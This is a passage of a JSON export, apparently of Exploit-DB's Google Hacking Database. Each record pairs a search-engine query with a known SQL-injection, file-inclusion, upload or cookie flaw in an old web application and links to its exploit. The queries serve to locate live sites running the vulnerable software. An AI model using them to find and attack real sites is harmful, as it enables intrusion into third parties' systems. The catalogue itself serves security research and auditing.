"https://www.exploit-db.com/ghdb/1952/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=allinurl+:%22modules/gallery%22", "shortDescription": "allinurl :\"modules/gallery\"", "textualDescription": "XOOPS Module Gallery 0.2.2 (gid) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5241" }, { "signatureReferenceNumber": "1953", "link": "https://www.exploit-db.com/ghdb/1953/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intext:%22Design+by+MMA+Creative%22", "shortDescription": "intext:\"Design by MMA Creative\"", "textualDescription": "MMA Creative Design SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12706" }, { "signatureReferenceNumber": "1954", "link": "https://www.exploit-db.com/ghdb/1954/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:tr.php%3Fid%3D", "shortDescription": "inurl:tr.php?id=", "textualDescription": "Downline Goldmine Builder (tr.php id) Remote SQL Injection Vulnerability - CVE: 2008-4178: http://www.exploit-db.com/exploits/6946" }, { "signatureReferenceNumber": "1955", "link": "https://www.exploit-db.com/ghdb/1955/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=''com_noticias''", "shortDescription": "''com_noticias''", "textualDescription": "Joomla Component com_noticias 1.0 SQL Injection Vulnerability - CVE: 2008-0670: http://www.exploit-db.com/exploits/5081" }, { "signatureReferenceNumber": "1956", "link": "https://www.exploit-db.com/ghdb/1956/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22MobPartner+Counter%22+%22upload+files%22", "shortDescription": "\"MobPartner Counter\" \"upload files\"", "textualDescription": "MobPartner Counter - Remote File Upload Vulnerability: http://www.exploit-db.com/exploits/11019" }, { "signatureReferenceNumber": "1957", "link": "https://www.exploit-db.com/ghdb/1957/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=allinurl:+%22modules/glossaires%22", "shortDescription": "allinurl: \"modules/glossaires\"", "textualDescription": "XOOPS Module Glossario 2.2 (sid) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5216" }, { "signatureReferenceNumber": "1958", "link": "https://www.exploit-db.com/ghdb/1958/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:com_netinvoice", "shortDescription": "inurl:com_netinvoice", "textualDescription": "Joomla Component netinvoice 1.2.0 SP1 SQL Injection Vulnerability - CVE: 2008-3498: http://www.exploit-db.com/exploits/5939" }, { "signatureReferenceNumber": "1960", "link": "https://www.exploit-db.com/ghdb/1960/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:com_beamospetition", "shortDescription": "inurl:com_beamospetition", "textualDescription": "Joomla Component beamospetition Remote SQL Injection Vulnerability - CVE: 2008-3132: http://www.exploit-db.com/exploits/5965" }, { "signatureReferenceNumber": "1961", "link": "https://www.exploit-db.com/ghdb/1961/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22com_lmo%22", "shortDescription": "\"com_lmo\"", "textualDescription": "Joomla LMO Component 1.0b2 Remote Include Vulnerability - CVE: 2006-3970: http://www.exploit-db.com/exploits/2092" }, { "signatureReferenceNumber": "1962", "link": "https://www.exploit-db.com/ghdb/1962/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+Clicknet+CMS%22", "shortDescription": "\"Powered by Clicknet CMS\"", "textualDescription": "Clicknet CMS 2.1 (side) Arbitrary File Disclosure Vulnlerability - CVE: 2009-2325: http://www.exploit-db.com/exploits/9037" }, { "signatureReferenceNumber": "1963", "link": "https://www.exploit-db.com/ghdb/1963/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Igloo+(interest+group+glue)", "shortDescription": "Igloo (interest group glue)", "textualDescription": "Igloo 0.1.9 (Wiki.php) Remote File Include Vulnerability - CVE: 2006-2819: http://www.exploit-db.com/exploits/1863" }, { "signatureReferenceNumber": "1964", "link": "https://www.exploit-db.com/ghdb/1964/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22com_acstartseite%22", "shortDescription": "inurl:\"com_acstartseite\"", "textualDescription": "Joomla Component com_acstartseite Sql Injection Vulnerability: http://www.exploit-db.com/exploits/11479" }, { "signatureReferenceNumber": "1965", "link": "https://www.exploit-db.com/ghdb/1965/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+Populum%22", "shortDescription": "\"Powered by Populum\"", "textualDescription": "Populum 2.3 SQL injection vulnerability: http://www.exploit-db.com/exploits/11126" }, { "signatureReferenceNumber": "1967", "link": "https://www.exploit-db.com/ghdb/1967/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+PWP+Version+1-5-1%22+AND+inurl:%22/wiki/run.php%22", "shortDescription": "\"Powered by PWP Version 1-5-1\" AND inurl:\"/wiki/run.php\"", "textualDescription": "PWP Wiki Processor 1-5-1 Remote File Upload Vulnerability: http://www.exploit-db.com/exploits/7740" }, { "signatureReferenceNumber": "1968", "link": "https://www.exploit-db.com/ghdb/1968/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intext:%22Design+by+BB+Media.Org%22", "shortDescription": "intext:\"Design by BB Media.Org\"", "textualDescription": "BBMedia Design's SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12711" }, { "signatureReferenceNumber": "1969", "link": "https://www.exploit-db.com/ghdb/1969/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22com_acprojects%22", "shortDescription": "inurl:\"com_acprojects\"", "textualDescription": "Joomla Component com_acprojects Sql Injection Vulnerability: http://www.exploit-db.com/exploits/11480" }, { "signatureReferenceNumber": "1970", "link": "https://www.exploit-db.com/ghdb/1970/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22com_acteammember%22", "shortDescription": "inurl:\"com_acteammember\"", "textualDescription": "Joomla Component com_acteammember SQL Injection Vulnerability: http://www.exploit-db.com/exploits/11483" }, { "signatureReferenceNumber": "1971", "link": "https://www.exploit-db.com/ghdb/1971/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Powered+by+Maian+Weblog+v4.0", "shortDescription": "Powered by Maian Weblog v4.0", "textualDescription": "Maian Weblog 4.0 Insecure Cookie Handling Vulnerability - CVE: 2008-3318: http://www.exploit-db.com/exploits/6064" }, { "signatureReferenceNumber": "1972", "link": "https://www.exploit-db.com/ghdb/1972/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Powered+by:+Maian+Recipe+v1.2", "shortDescription": "Powered by: Maian Recipe v1.2", "textualDescription": "Maian Recipe 1.2 Insecure Cookie Handling Vulnerability - CVE: 2008-3322: http://www.exploit-db.com/exploits/6063" }, { "signatureReferenceNumber": "1973", "link": "https://www.exploit-db.com/ghdb/1973/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Powered+by:+Maian+Search+v1.1", "shortDescription": "Powered by: Maian Search v1.1", "textualDescription": "Maian Search 1.1 Insecure Cookie Handling Vulnerability - CVE: 2008-3317: http://www.exploit-db.com/exploits/6066" }, { "signatureReferenceNumber": "1974", "link": "https://www.exploit-db.com/ghdb/1974/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Powered+by:+Maian+Links+v3.1", "shortDescription": "Powered by: Maian Links v3.1", "textualDescription": "Maian Links 3.1 Insecure Cookie Handling Vulnerability - CVE: 2008-3319: http://www.exploit-db.com/exploits/6062" }, { "signatureReferenceNumber": "1975", "link": "https://www.exploit-db.com/ghdb/1975/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Powered+by:+Maian+Uploader+v4.0", "shortDescription": "Powered by: Maian Uploader v4.0", "textualDescription": "Maian Uploader 4.0 Insecure Cookie Handling Vulnerability - CVE: 2008-3321: http://www.exploit-db.com/exploits/6065" }, { "signatureReferenceNumber": "1976", "link": "https://www.exploit-db.com/ghdb/1976/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+By+Steamcast+%220.9.75+beta", "shortDescription": "\"Powered By Steamcast \"0.9.75 beta", "textualDescription": "Steamcast 0.9.75b Remote Denial of Service: http://www.exploit-db.com/exploits/8429" }, { "signatureReferenceNumber": "1977", "link": "https://www.exploit-db.com/ghdb/1977/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Powered+by+Maian+Guestbook+v3.2", "shortDescription": "Powered by Maian Guestbook v3.2", "textualDescription": "Maian Guestbook 3.2 Insecure Cookie Handling Vulnerability - CVE: 2008-3320: http://www.exploit-db.com/exploits/6061" }, { "signatureReferenceNumber": "1978", "link": "https://www.exploit-db.com/ghdb/1978/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:acrotxt.php+wbb", "shortDescription": "inurl:acrotxt.php wbb", "textualDescription": "WBB2-Addon: Acrotxt v1 (show) Remote SQL Injection Vulnerability - CVE: 2007-4581: http://www.exploit-db.com/exploits/4327" }, { "signatureReferenceNumber": "1981", "link": "https://www.exploit-db.com/ghdb/1981/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Designed+by:InterTech+Co", "shortDescription": "Designed by:InterTech Co", "textualDescription": "InterTech Co 1.0 SQL Injection: http://www.exploit-db.com/exploits/11440" }, { "signatureReferenceNumber": "1982", "link": "https://www.exploit-db.com/ghdb/1982/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=allinurl:+cid%22modules/classifieds/index.php%3Fpa%3DAdsview%22", "shortDescription": "allinurl: cid\"modules/classifieds/index.php?pa=Adsview\"", "textualDescription": "XOOPS Module classifieds (cid) Remote SQL Injection Vulnerability - CVE: 2008-0873: http://www.exploit-db.com/exploits/5158" }, { "signatureReferenceNumber": "1984", "link": "https://www.exploit-db.com/ghdb/1984/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=News+powered+by+ashnews", "shortDescription": "News powered by ashnews", "textualDescription": "ashNews 0.83 (pathtoashnews) Remote File Include Vulnerabilities - CVE: 2003-1292: http://www.exploit-db.com/exploits/1864" }, { "signatureReferenceNumber": "1985", "link": "https://www.exploit-db.com/ghdb/1985/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Transloader+by+Somik.org%22+OR+%22Transloader+by%22+OR+%22Transloder%22", "shortDescription": "\"Transloader by Somik.org\" OR \"Transloader by\" OR \"Transloder\"", "textualDescription": "Transload Script Upload Vulnerability: http://www.exploit-db.com/exploits/11155" }, { "signatureReferenceNumber": "1986", "link": "https://www.exploit-db.com/ghdb/1986/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=allinurl:+%22modules+MyAnnonces+index+php+pa+view%22", "shortDescription": "allinurl: \"modules MyAnnonces index php pa view\"", "textualDescription": "RunCMS Module MyAnnonces (cid) SQL Injection Vulnerability - CVE: 2008-0878: http://www.exploit-db.com/exploits/5156" }, { "signatureReferenceNumber": "1987", "link": "https://www.exploit-db.com/ghdb/1987/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22News+Managed+by+Ditto+News%22", "shortDescription": "\"News Managed by Ditto News\"", "textualDescription": "Xtreme/Ditto News 1.0 (post.php) Remote File Include Vulnerability: http://www.exploit-db.com/exploits/1887" }, { "signatureReferenceNumber": "1988", "link": "https://www.exploit-db.com/ghdb/1988/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Powered+by+ArticlesOne.com+oR+Website+Powered+by+ArticlesOne.com", "shortDescription": "Powered by ArticlesOne.com oR Website Powered by ArticlesOne.com", "textualDescription": "ArticlesOne 07232006 (page) Remote Include Vulnerability: http://www.exploit-db.com/exploits/2063" }, { "signatureReferenceNumber": "1989", "link": "https://www.exploit-db.com/ghdb/1989/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Coded+By+WebLOADER", "shortDescription": "Coded By WebLOADER", "textualDescription": "Webloader v7 - v8 ( vid ) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12647" }, { "signatureReferenceNumber": "1990", "link": "https://www.exploit-db.com/ghdb/1990/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+Philboard%22+inurl:%22philboard_forum.asp%22", "shortDescription": "\"Powered by Philboard\" inurl:\"philboard_forum.asp\"", "textualDescription": "Philboard 1.14 (philboard_forum.asp) SQL Injection Vulnerability - CVE: 2007-0920: http://www.exploit-db.com/exploits/3295" }, { "signatureReferenceNumber": "1991", "link": "https://www.exploit-db.com/ghdb/1991/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22powered+by+CubeCart%22+inurl:%22index.php%3F_a%3D%22", "shortDescription": "\"powered by CubeCart\" inurl:\"index.php?_a=\"", "textualDescription": "CubeCart (index.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/11495" }, { "signatureReferenceNumber": "1992", "link": "https://www.exploit-db.com/ghdb/1992/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22com_jjgallery", "shortDescription": "inurl:\"com_jjgallery", "textualDescription": "Joomla Component Carousel Flash Image Gallery RFI Vulnerability - CVE: 2007-6027: http://www.exploit-db.com/exploits/4626" }, { "signatureReferenceNumber": "1993", "link": "https://www.exploit-db.com/ghdb/1993/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=intext:%22jPORTAL+2%22++inurl:%22mailer.php%22", "shortDescription": "intext:\"jPORTAL 2\" inurl:\"mailer.php\"", "textualDescription": "jPORTAL 2 mailer.php Remote SQL Injection Vulnerability - CVE: 2007-5974: http://www.exploit-db.com/exploits/4611" }, { "signatureReferenceNumber": "1994", "link": "https://www.exploit-db.com/ghdb/1994/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=intext:+%22Site+developed+%26+mantained+by+Woodall+Creative+Group%22", "shortDescription": "intext: \"Site developed & mantained by Woodall Creative Group\"", "textualDescription": "Woodall Creative SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12576" }, { "signatureReferenceNumber": "1996", "link": "https://www.exploit-db.com/ghdb/1996/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:CuteSoft_Client/CuteEditor", "shortDescription": "inurl:CuteSoft_Client/CuteEditor", "textualDescription": "Cute Editor ASP.NET Remote File Disclosure Vulnerability - CVE: 2009-4665: http://www.exploit-db.com/exploits/8785" }, { "signatureReferenceNumber": "1997", "link": "https://www.exploit-db.com/ghdb/1997/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Web+Group+Communication+Center+beta+0.5.6%22+OR+%22Web+Group+Communication+Center+beta+0.5.5%22", "shortDescription": "\"Web Group Communication Center beta 0.5.6\" OR \"Web Group Communication Center beta 0.5.5\"", "textualDescription": "WGCC 0.5.6b (quiz.php) Remote SQL Injection Vulnerability - CVE: 2006-5514: http://www.exploit-db.com/exploits/2604" }, { "signatureReferenceNumber": "1998", "link": "https://www.exploit-db.com/ghdb/1998/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Actionn%C3%83%C6%92%C3%82%C2%A9e+par+smartblog", "shortDescription": "Actionn\u00c3\u0192\u00c2\u00a9e par smartblog", "textualDescription": "Smartblog (index.php tid) Remote SQL Injection Vulnerability - CVE: 2008-2185: http://www.exploit-db.com/exploits/5535" }, { "signatureReferenceNumber": "1999", "link": "https://www.exploit-db.com/ghdb/1999/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22picture.php%3Fcat%3D%22+%22Powered+by+PhpWebGallery+1.3.4%22", "shortDescription": "inurl:\"picture.php?cat=\" \"Powered by PhpWebGallery 1.3.4\"", "textualDescription": "PhpWebGallery 1.3.4 (cat) Blind SQL Injection Vulnerability: http://www.exploit-db.com/exploits/6436" }, { "signatureReferenceNumber": "2000", "link": "https://www.exploit-db.com/ghdb/2000/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:tr.php%3Fid%3D", "shortDescription": "inurl:tr.php?id=", "textualDescription": "Downline Goldmine newdownlinebuilder (tr.php id) SQL Injection Vuln: http://www.exploit-db.com/exploits/6951" }, { "signatureReferenceNumber": "2001", "link": "https://www.exploit-db.com/ghdb/2001/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:tr.php%3Fid%3D", "shortDescription": "inurl:tr.php?id=", "textualDescription": "Downline Goldmine paidversion (tr.php id) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/6950" }, { "signatureReferenceNumber": "2002", "link": "https://www.exploit-db.com/ghdb/2002/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=allintext:%22Browse+Blogs+by+Category%22", "shortDescription": "allintext:\"Browse Blogs by Category\"", "textualDescription": "Blog System 1.x (index.php news_id) Remote SQL Injection Vulnerability - CVE: 2007-3979: http://www.exploit-db.com/exploits/4206" }, { "signatureReferenceNumber": "2004", "link": "https://www.exploit-db.com/ghdb/2004/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:option%3Dcom_mydyngallery", "shortDescription": "inurl:option=com_mydyngallery", "textualDescription": "Joomla Component mydyngallery 1.4.2 (directory) SQL Injection Vuln - CVE: 2008-5957: http://www.exploit-db.com/exploits/7343" }, { "signatureReferenceNumber": "2006", "link": "https://www.exploit-db.com/ghdb/2006/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:index.php%3Fmod%3Dsondages", "shortDescription": "inurl:index.php?mod=sondages", "textualDescription": "KwsPHP 1.0 sondages Module Remote SQL Injection Vulnerability - CVE: 2007-4979: http://www.exploit-db.com/exploits/4422" }, { "signatureReferenceNumber": "2009", "link": "https://www.exploit-db.com/ghdb/2009/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22tr1.php%3Fid%3D%22+Forced+Matrix", "shortDescription": "inurl:\"tr1.php?id=\" Forced Matrix", "textualDescription": "YourFreeWorld Forced Matrix Script (id) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/6939" }, { "signatureReferenceNumber": "2010", "link": "https://www.exploit-db.com/ghdb/2010/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=allintext:%22SuperCali+Event+Calendar%22", "shortDescription": "allintext:\"SuperCali Event Calendar\"", "textualDescription": "SuperCali PHP Event Calendar 0.4.0 SQL Injection Vulnerability - CVE: 2007-3582: http://www.exploit-db.com/exploits/4141" }, { "signatureReferenceNumber": "2011", "link": "https://www.exploit-db.com/ghdb/2011/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22com_ckforms%22", "shortDescription": "inurl:\"com_ckforms\"", "textualDescription": "Joomla Component (com_ckforms) Local File Inclusion Vulnerability: http://www.exploit-db.com/exploits/15453" }, { "signatureReferenceNumber": "2012", "link": "https://www.exploit-db.com/ghdb/2012/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22com_prayercenter%22", "shortDescription": "inurl:\"com_prayercenter\"", "textualDescription": "Joomla Component prayercenter 1.4.9 (id) SQL Injection Vulnerability - CVE: 2008-6429: http://www.exploit-db.com/exploits/5708/" }, { "signatureReferenceNumber": "2013", "link": "https://www.exploit-db.com/ghdb/2013/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+Glossword+1.8.11%22+OR+%22Powered+by+Glossword+1.8.6%22", "shortDescription": "\"Powered by Glossword 1.8.11\" OR \"Powered by Glossword 1.8.6\"", "textualDescription": "Glossword 1.8.11 (index.php x) Local File Inclusion Vulnerability: http://www.exploit-db.com/exploits/9010" }, { "signatureReferenceNumber": "2014", "link": "https://www.exploit-db.com/ghdb/2014/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=ADP+Forum+2.0.3+is+powered+by+VzScripts", "shortDescription": "ADP Forum 2.0.3 is powered by VzScripts", "textualDescription": "Vz (Adp) Forum 2.0.3 Remote Password Disclosure Vulnerablity - CVE: 2006-6891: http://www.exploit-db.com/exploits/3053" }, { "signatureReferenceNumber": "2015", "link": "https://www.exploit-db.com/ghdb/2015/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22com_ccnewsletter%22", "shortDescription": "inurl:\"com_ccnewsletter\"", "textualDescription": "Joomla Component com_ccnewsletter LFI Vulnerability - CVE: 2010-0467: http://www.exploit-db.com/exploits/11282" }, { "signatureReferenceNumber": "2016", "link": "https://www.exploit-db.com/ghdb/2016/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22add_soft.php%22", "shortDescription": "inurl:\"add_soft.php\"", "textualDescription": "Software Index 1.1 (cid) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5378" }, { "signatureReferenceNumber": "2017", "link": "https://www.exploit-db.com/ghdb/2017/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=pages.php%3Fid%3D+%22Multi+Vendor+Mall%22", "shortDescription": "pages.php?id= \"Multi Vendor Mall\"", "textualDescription": "Multi Vendor Mall (itemdetail.php & shop.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12755" }, { "signatureReferenceNumber": "2018", "link": "https://www.exploit-db.com/ghdb/2018/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Search+Affiliate+Programs:%22", "shortDescription": "\"Search Affiliate Programs:\"", "textualDescription": "Affiliate Directory (cat_id) Remote SQL Injection Vulnerbility: http://www.exploit-db.com/exploits/5363" }, { "signatureReferenceNumber": "2019", "link": "https://www.exploit-db.com/ghdb/2019/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=intitle:%22Dacio's+Image+Gallery%22", "shortDescription": "intitle:\"Dacio's Image Gallery\"", "textualDescription": "Dacio's Image Gallery 1.6 (DT/Bypass/SU) Remote Vulnerabilities: http://www.exploit-db.com/exploits/8653" }, { "signatureReferenceNumber": "2020", "link": "https://www.exploit-db.com/ghdb/2020/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Website+by+Spokane+Web+Communications%22", "shortDescription": "\"Website by Spokane Web Communications\"", "textualDescription": "ArticleLive (Interspire Website Publisher) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12526" }, { "signatureReferenceNumber": "2022", "link": "https://www.exploit-db.com/ghdb/2022/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22powered+by:+elkagroup%22", "shortDescription": "\"powered by: elkagroup\"", "textualDescription": "elkagroup SQL Injection Vulnerability - CVE: 2009-4569: http://www.exploit-db.com/exploits/10330" }, { "signatureReferenceNumber": "2023", "link": "https://www.exploit-db.com/ghdb/2023/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=allinurl:/myspeach/", "shortDescription": "allinurl:/myspeach/", "textualDescription": "MySpeach 3.0.2 (my_ms[root]) Remote File Include Vulnerability - CVE: 2006-4630: http://www.exploit-db.com/exploits/2301" }, { "signatureReferenceNumber": "2024", "link": "https://www.exploit-db.com/ghdb/2024/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+Revsense", "shortDescription": "Powered by Revsense", "textualDescription": "RevSense (Auth bypass) Remote SQL Injection Vulnerability - CVE: 2008-6309: http://www.exploit-db.com/exploits/7163" }, { "signatureReferenceNumber": "2025", "link": "https://www.exploit-db.com/ghdb/2025/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=724CMS+Powered,+724CMS+Version+4.59.+Enterprise", "shortDescription": "724CMS Powered, 724CMS Version 4.59. Enterprise", "textualDescription": "724CMS Enterprise Version 4.59 SQL Injection Vulnerability - CVE: 2008-1858: http://www.exploit-db.com/exploits/12560" }, { "signatureReferenceNumber": "2026", "link": "https://www.exploit-db.com/ghdb/2026/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=index.php%3Foption%3Dcom_facileforms", "shortDescription": "index.php?option=com_facileforms", "textualDescription": "Joomla Component com_facileforms 1.4.4 RFI Vulnerability - CVE: 2008-2990: http://www.exploit-db.com/exploits/5915" }, { "signatureReferenceNumber": "2027", "link": "https://www.exploit-db.com/ghdb/2027/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+By+phUploader", "shortDescription": "Powered By phUploader", "textualDescription": "phUploader Remote File Upload Vulnerability - CVE: 2007-4527: http://www.exploit-db.com/exploits/10574" }, { "signatureReferenceNumber": "2028", "link": "https://www.exploit-db.com/ghdb/2028/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22myLDlinker.php%22", "shortDescription": "inurl:\"myLDlinker.php\"", "textualDescription": "WordPress Plugin myLDlinker SQL Injection Vulnerability - CVE: 2010-2924: http://www.exploit-db.com/exploits/14441" }, { "signatureReferenceNumber": "2029", "link": "https://www.exploit-db.com/ghdb/2029/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:com_idoblog", "shortDescription": "inurl:com_idoblog", "textualDescription": "Joomla Component iDoBlog b24 Remote SQL Injection Vulnerability - CVE: 2008-2627: http://www.exploit-db.com/exploits/5730" }, { "signatureReferenceNumber": "2030", "link": "https://www.exploit-db.com/ghdb/2030/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=/modules/xhresim/", "shortDescription": "/modules/xhresim/", "textualDescription": "XOOPS Module xhresim (index.php no) Remote SQL Injection Vuln - CVE: 2008-5665: http://www.exploit-db.com/exploits/6748" }, { "signatureReferenceNumber": "2032", "link": "https://www.exploit-db.com/ghdb/2032/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Maian+Events+v2.0+Copyright+%C3%82%C2%A9+2005-2008+Maian+Script+World.+All+Rights+Reserved", "shortDescription": "Maian Events v2.0 Copyright \u00c2\u00a9 2005-2008 Maian Script World. All Rights Reserved", "textualDescription": "Maian Events 2.0 Insecure Cookie Handling Vulnerability: http://www.exploit-db.com/exploits/6048" }, { "signatureReferenceNumber": "2033", "link": "https://www.exploit-db.com/ghdb/2033/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+FubarForum+v1.5%22", "shortDescription": "\"Powered by FubarForum v1.5\"", "textualDescription": "FubarForum 1.5 (index.php page) Local File Inclusion Vulnerability - CVE: 2008-2887: http://www.exploit-db.com/exploits/5872" }, { "signatureReferenceNumber": "2034", "link": "https://www.exploit-db.com/ghdb/2034/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=/modules/amevents/print.php%3Fid%3D", "shortDescription": "/modules/amevents/print.php?id=", "textualDescription": "XOOPS Module Amevents (print.php id) SQL Injection Vulnerability - CVE: 2008-5768: http://www.exploit-db.com/exploits/7479" }, { "signatureReferenceNumber": "2036", "link": "https://www.exploit-db.com/ghdb/2036/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=allinurl:+com_gallery+%22func%22", "shortDescription": "allinurl: com_gallery \"func\"", "textualDescription": "Mambo Component com_gallery Remote SQL Injection Vulnerability - CVE: 2008-0746: http://www.exploit-db.com/exploits/5084" }, { "signatureReferenceNumber": "2037", "link": "https://www.exploit-db.com/ghdb/2037/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22pForum+1.29a%22++OR+%22%22Powie's+PSCRIPT+Forum+1.26%22", "shortDescription": "\"pForum 1.29a\" OR \"\"Powie's PSCRIPT Forum 1.26\"", "textualDescription": "Powies pForum 1.29a (editpoll.php) SQL Injection Vulnerability - CVE: 2006-6038: http://www.exploit-db.com/exploits/2797" }, { "signatureReferenceNumber": "2038", "link": "https://www.exploit-db.com/ghdb/2038/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=allinurl:+%22/modules/myTopics/%22", "shortDescription": "allinurl: \"/modules/myTopics/\"", "textualDescription": "XOOPS Module myTopics (articleid) Remote SQL Injection Vulnerability - CVE: 2008-0847: http://www.exploit-db.com/exploits/5148" }, { "signatureReferenceNumber": "2039", "link": "https://www.exploit-db.com/ghdb/2039/", "category": "Advisories and Vulnerabilities", "querystring": 